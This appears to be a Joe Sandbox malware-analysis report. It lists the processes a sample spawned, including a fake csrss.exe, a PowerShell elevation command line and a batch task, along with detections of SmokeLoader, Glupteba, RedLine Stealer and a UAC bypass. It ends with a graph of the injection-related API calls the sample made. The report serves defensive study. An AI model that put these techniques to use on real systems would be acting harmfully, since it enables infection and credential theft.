                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:17
                                                                                                                                                                    Start time:19:08:51
                                                                                                                                                                    Start date:08/02/2024
                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\6374.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\6374.exe"
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:431'104 bytes
                                                                                                                                                                    MD5 hash:1996A23C7C764A77CCACF5808FEC23B0
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000011.00000002.1767077662.0000000000413000.00000004.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:18
                                                                                                                                                                    Start time:19:08:51
                                                                                                                                                                    Start date:08/02/2024
                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmp
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\is-P7ABK.tmp\78A4.tmp" /SL5="$801FA,8085089,54272,C:\Users\user\AppData\Local\Temp\78A4.exe"
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:704'000 bytes
                                                                                                                                                                    MD5 hash:426607EDCEEC6A310076FA659B073D1D
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:20
                                                                                                                                                                    Start time:19:08:53
                                                                                                                                                                    Start date:08/02/2024
                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\78A4.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\78A4.exe" /SPAWNWND=$10490 /NOTIFYWND=$801FA
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:8'336'105 bytes
                                                                                                                                                                    MD5 hash:7176404D8394DECDC9399BB62C01A2FF
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:21
                                                                                                                                                                    Start time:19:08:53
                                                                                                                                                                    Start date:08/02/2024
                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmp
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\is-GD1HP.tmp\78A4.tmp" /SL5="$18004E,8085089,54272,C:\Users\user\AppData\Local\Temp\78A4.exe" /SPAWNWND=$10490 /NOTIFYWND=$801FA
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:704'000 bytes
                                                                                                                                                                    MD5 hash:426607EDCEEC6A310076FA659B073D1D
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:low
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:22
                                                                                                                                                                    Start time:19:08:54
                                                                                                                                                                    Start date:08/02/2024
                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                                                    Imagebase:0x7ff743e40000
                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:high
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:23
                                                                                                                                                                    Start time:19:08:55
                                                                                                                                                                    Start date:08/02/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 7620 -ip 7620
                                                                                                                                                                    Imagebase:0x900000
                                                                                                                                                                    File size:489'328 bytes
                                                                                                                                                                    MD5 hash:F5210A4A7E411A1BAD3844586A74B574
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:24
                                                                                                                                                                    Start time:19:08:55
                                                                                                                                                                    Start date:08/02/2024
                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe" -i
                                                                                                                                                                    Imagebase:0x7ff7a45a0000
                                                                                                                                                                    File size:3'861'569 bytes
                                                                                                                                                                    MD5 hash:EB428F0ECD8AD6907A62E6A0ACEAB53F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:25
                                                                                                                                                                    Start time:19:08:55
                                                                                                                                                                    Start date:08/02/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7620 -s 640
                                                                                                                                                                    Imagebase:0x900000
                                                                                                                                                                    File size:489'328 bytes
                                                                                                                                                                    MD5 hash:F5210A4A7E411A1BAD3844586A74B574
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:26
                                                                                                                                                                    Start time:19:08:56
                                                                                                                                                                    Start date:08/02/2024
                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Any Burn Free\anyburnfree.exe" -s
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:3'861'569 bytes
                                                                                                                                                                    MD5 hash:EB428F0ECD8AD6907A62E6A0ACEAB53F
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 0000001A.00000002.3843084252.0000000002CB1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_Socks5Systemz, Description: Yara detected Socks5Systemz, Source: 0000001A.00000002.3842255006.0000000002708000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:27
                                                                                                                                                                    Start time:19:08:57
                                                                                                                                                                    Start date:08/02/2024
                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\914D.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\914D.exe
                                                                                                                                                                    Imagebase:0x5e0000
                                                                                                                                                                    File size:9'104'384 bytes
                                                                                                                                                                    MD5 hash:CEAE65EE17FF158877706EDFE2171501
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: MALWARE_Win_DLInjector04, Description: Detects downloader / injector, Source: C:\Users\user\AppData\Local\Temp\914D.exe, Author: ditekSHen
                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                    • Detection: 92%, ReversingLabs
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:28
                                                                                                                                                                    Start time:19:08:58
                                                                                                                                                                    Start date:08/02/2024
                                                                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                                                                                                                                                                    Imagebase:0x7ff743e40000
                                                                                                                                                                    File size:55'320 bytes
                                                                                                                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:29
                                                                                                                                                                    Start time:19:08:58
                                                                                                                                                                    Start date:08/02/2024
                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\288c47bbc1871b439df19ff4df68f076.exe"
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:4'315'536 bytes
                                                                                                                                                                    MD5 hash:D122F827C4FC73F9A06D7F6F2D08CD95
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000001D.00000002.1943821340.0000000002D80000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                    • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 0000001D.00000002.1932113759.0000000000843000.00000040.00000001.01000000.00000015.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 0000001D.00000003.1834912962.0000000003AB2000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_Glupteba, Description: Yara detected Glupteba, Source: 0000001D.00000002.1943821340.00000000031C3000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001D.00000002.1937113796.0000000002985000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                    • Detection: 79%, ReversingLabs
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:30
                                                                                                                                                                    Start time:19:08:58
                                                                                                                                                                    Start date:08/02/2024
                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\InstallSetup4.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\InstallSetup4.exe"
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:2'123'218 bytes
                                                                                                                                                                    MD5 hash:28B72E7425D6D224C060D3CF439C668C
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                    • Detection: 63%, ReversingLabs
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:31
                                                                                                                                                                    Start time:19:08:59
                                                                                                                                                                    Start date:08/02/2024
                                                                                                                                                                    Path:C:\ProgramData\Drivers\csrss.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\ProgramData\Drivers\csrss.exe"
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:1'998'848 bytes
                                                                                                                                                                    MD5 hash:151E9EC4F0355D2F131B871671BD5E20
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001F.00000002.1833599796.0000000002800000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                    • Detection: 88%, ReversingLabs
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:32
                                                                                                                                                                    Start time:19:08:59
                                                                                                                                                                    Start date:08/02/2024
                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\FourthX.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:"C:\Users\user\AppData\Local\Temp\FourthX.exe"
                                                                                                                                                                    Imagebase:0x7ff7441f0000
                                                                                                                                                                    File size:2'654'720 bytes
                                                                                                                                                                    MD5 hash:B03886CB64C04B828B6EC1B2487DF4A4
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                    • Detection: 92%, ReversingLabs
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:33
                                                                                                                                                                    Start time:19:08:59
                                                                                                                                                                    Start date:08/02/2024
                                                                                                                                                                    Path:C:\ProgramData\Drivers\csrss.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:"C:\ProgramData\Drivers\csrss.exe"
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:1'998'848 bytes
                                                                                                                                                                    MD5 hash:151E9EC4F0355D2F131B871671BD5E20
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:34
                                                                                                                                                                    Start time:19:09:00
                                                                                                                                                                    Start date:08/02/2024
                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Process "C:\Users\user\AppData\Local\Temp\FourthX.exe" -Verb runAs
                                                                                                                                                                    Imagebase:0x7ff6f70b0000
                                                                                                                                                                    File size:486'400 bytes
                                                                                                                                                                    MD5 hash:DFD66604CA0898E8E26DF7B1635B6326
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:35
                                                                                                                                                                    Start time:19:09:00
                                                                                                                                                                    Start date:08/02/2024
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff720030000
                                                                                                                                                                    File size:873'472 bytes
                                                                                                                                                                    MD5 hash:7366FBEFE66BA0F1F5304F7D6FEF09FE
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:36
                                                                                                                                                                    Start time:19:09:01
                                                                                                                                                                    Start date:08/02/2024
                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\BroomSetup.exe
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:4'979'200 bytes
                                                                                                                                                                    MD5 hash:5E94F0F6265F9E8B2F706F1D46BBD39E
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:Borland Delphi
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000024.00000000.1817855025.0000000000401000.00000020.00000001.01000000.00000019.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Local\Temp\BroomSetup.exe, Author: Joe Security
                                                                                                                                                                    Antivirus matches:
                                                                                                                                                                    • Detection: 21%, ReversingLabs
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:37
                                                                                                                                                                    Start time:19:09:04
                                                                                                                                                                    Start date:08/02/2024
                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\AD52.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\AD52.exe
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:175'104 bytes
                                                                                                                                                                    MD5 hash:BA79778FB5C76EE86A3719452732A68B
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000025.00000002.1910346635.00000000001F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000025.00000002.1913820114.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000025.00000002.1913820114.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000025.00000002.1913902392.0000000002D51000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000025.00000002.1913902392.0000000002D51000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000025.00000002.1914262118.0000000002F3A000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                    • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000025.00000003.1854293498.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:38
                                                                                                                                                                    Start time:19:09:06
                                                                                                                                                                    Start date:08/02/2024
                                                                                                                                                                    Path:C:\Users\user\AppData\Local\Temp\B68B.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Users\user\AppData\Local\Temp\B68B.exe
                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                    File size:174'080 bytes
                                                                                                                                                                    MD5 hash:5F11B580F135B8479A48BDF6000C31CE
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Yara matches:
                                                                                                                                                                    • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000026.00000002.1929625972.0000000002BFA000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                    • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000026.00000002.1931017304.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:39
                                                                                                                                                                    Start time:19:09:08
                                                                                                                                                                    Start date:08/02/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Temp\Task.bat" "
                                                                                                                                                                    Imagebase:0xb80000
                                                                                                                                                                    File size:236'544 bytes
                                                                                                                                                                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:40
                                                                                                                                                                    Start time:19:09:07
                                                                                                                                                                    Start date:08/02/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2000 -ip 2000
                                                                                                                                                                    Imagebase:0x900000
                                                                                                                                                                    File size:489'328 bytes
                                                                                                                                                                    MD5 hash:F5210A4A7E411A1BAD3844586A74B574
                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:41
                                                                                                                                                                    Start time:19:09:07
                                                                                                                                                                    Start date:08/02/2024
                                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2000 -s 356
                                                                                                                                                                    Imagebase:0x900000
                                                                                                                                                                    File size:489'328 bytes
                                                                                                                                                                    MD5 hash:F5210A4A7E411A1BAD3844586A74B574
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:42
                                                                                                                                                                    Start time:19:09:08
                                                                                                                                                                    Start date:08/02/2024
                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:0x7ff720030000
                                                                                                                                                                    File size:873'472 bytes
                                                                                                                                                                    MD5 hash:7366FBEFE66BA0F1F5304F7D6FEF09FE
                                                                                                                                                                    Has elevated privileges:false
                                                                                                                                                                    Has administrator privileges:false
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:true

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:53
                                                                                                                                                                    Start time:19:09:09
                                                                                                                                                                    Start date:08/02/2024
                                                                                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                    Wow64 process (32bit):
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:
                                                                                                                                                                    File size:873'472 bytes
                                                                                                                                                                    MD5 hash:7366FBEFE66BA0F1F5304F7D6FEF09FE
                                                                                                                                                                    Has elevated privileges:
                                                                                                                                                                    Has administrator privileges:
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:184
                                                                                                                                                                    Start time:19:10:28
                                                                                                                                                                    Start date:08/02/2024
                                                                                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                    Wow64 process (32bit):
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:
                                                                                                                                                                    File size:873'472 bytes
                                                                                                                                                                    MD5 hash:7366FBEFE66BA0F1F5304F7D6FEF09FE
                                                                                                                                                                    Has elevated privileges:
                                                                                                                                                                    Has administrator privileges:
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    General

                                                                                                                                                                    Target ID:204
                                                                                                                                                                    Start time:19:10:45
                                                                                                                                                                    Start date:08/02/2024
                                                                                                                                                                    Path:C:\Windows\System32\Conhost.exe
                                                                                                                                                                    Wow64 process (32bit):
                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                    Imagebase:
                                                                                                                                                                    File size:873'472 bytes
                                                                                                                                                                    MD5 hash:7366FBEFE66BA0F1F5304F7D6FEF09FE
                                                                                                                                                                    Has elevated privileges:
                                                                                                                                                                    Has administrator privileges:
                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                    Has exited:false

                                                                                                                                                                    Disassembly

                                                                                                                                                                    Reset < >

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:4.7%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:20.3%
                                                                                                                                                                      Signature Coverage:51.9%
                                                                                                                                                                      Total number of Nodes:158
                                                                                                                                                                      Total number of Limit Nodes:5
                                                                                                                                                                      execution_graph 7840 421641 7841 421665 __floor_default __ctrlfp 7840->7841 7842 423d44 __except1 RaiseException 7841->7842 7843 4216b6 __floor_default __ctrlfp 7841->7843 7842->7843 7705 421447 7707 421453 7705->7707 7706 42146e GetClassLongW 7706->7707 7707->7706 7708 421490 7707->7708 7844 402e07 7845 402e1a 7844->7845 7846 40193e 11 API calls 7845->7846 7847 402f54 7845->7847 7846->7847 7709 40194a 7710 40194f 7709->7710 7711 401991 Sleep 7710->7711 7712 4019ac 7711->7712 7713 401553 10 API calls 7712->7713 7714 4019bd 7712->7714 7713->7714 7848 423e0e 7849 423e44 __handle_exc 7848->7849 7850 423661 __raise_exc_ex RaiseException 7849->7850 7851 423e7a __except2 __umatherr __ctrlfp 7849->7851 7850->7851 7793 4225d1 IsProcessorFeaturePresent 7721 401561 7722 401570 7721->7722 7723 401608 NtDuplicateObject 7722->7723 7733 4018dd 7722->7733 7724 401625 NtCreateSection 7723->7724 7723->7733 7725 4016a5 NtCreateSection 7724->7725 7726 40164b NtMapViewOfSection 7724->7726 7727 4016d1 7725->7727 7725->7733 7726->7725 7728 40166e NtMapViewOfSection 7726->7728 7729 4016db NtMapViewOfSection 7727->7729 7727->7733 7728->7725 7730 40168c 7728->7730 7731 401702 NtMapViewOfSection 7729->7731 7729->7733 7730->7725 7732 401724 7731->7732 7731->7733 7732->7733 7734 401729 3 API calls 7732->7734 7734->7733 7735 423960 7738 423661 7735->7738 7739 423688 __raise_exc_ex 7738->7739 7740 42387b RaiseException 7739->7740 7741 423894 7740->7741 7640 1f003c 7641 1f0049 7640->7641 7653 1f0e0f SetErrorMode SetErrorMode 7641->7653 7646 1f0265 7647 1f02ce VirtualProtect 7646->7647 7649 1f030b 7647->7649 7648 1f0439 VirtualFree 7652 1f04be LoadLibraryA 7648->7652 7649->7648 7651 1f08c7 7652->7651 7654 1f0223 7653->7654 7655 1f0d90 7654->7655 7656 1f0dad 7655->7656 7657 1f0dbb GetPEB 7656->7657 7658 1f0238 VirtualAlloc 7656->7658 7657->7658 7658->7646 7794 4225e1 7795 4225fb __floor_default __ctrlfp 7794->7795 7797 42262c __floor_default __ctrlfp 7795->7797 7798 423d44 7795->7798 7799 423d7a __handle_exc 7798->7799 7800 423661 __raise_exc_ex RaiseException 7799->7800 7801 423da1 __except2 __umatherr __ctrlfp 7799->7801 7800->7801 7801->7797 7659 551df1 7660 551e00 7659->7660 7663 552591 7660->7663 7666 5525ac 7663->7666 7664 5525b5 CreateToolhelp32Snapshot 7665 5525d1 Module32First 7664->7665 7664->7666 7667 551e09 7665->7667 7668 5525e0 7665->7668 7666->7664 7666->7665 7670 552250 7668->7670 7671 55227b 7670->7671 7672 55228c VirtualAlloc 7671->7672 7673 5522c4 7671->7673 7672->7673 7673->7673 7587 4214b0 7588 4214ba 7587->7588 7591 421060 7588->7591 7592 42106d 7591->7592 7593 421092 GetTickCount SetLastError GetConsoleAliasesW 7592->7593 7599 4210cc 7592->7599 7594 4210b5 7593->7594 7595 421080 7593->7595 7597 4210c8 7594->7597 7598 4210be CreateDirectoryW 7594->7598 7595->7592 7596 42110f 7600 42111c InterlockedIncrement 7596->7600 7601 4211a5 7596->7601 7597->7599 7598->7597 7599->7596 7602 421105 ResetEvent 7599->7602 7606 421140 SetDefaultCommConfigW FreeEnvironmentStringsA GetCurrentDirectoryA EnumDateFormatsExA 7600->7606 7603 4211e5 OpenJobObjectA 7601->7603 7604 4211fb 10 API calls 7601->7604 7620 421303 7601->7620 7602->7599 7603->7604 7604->7620 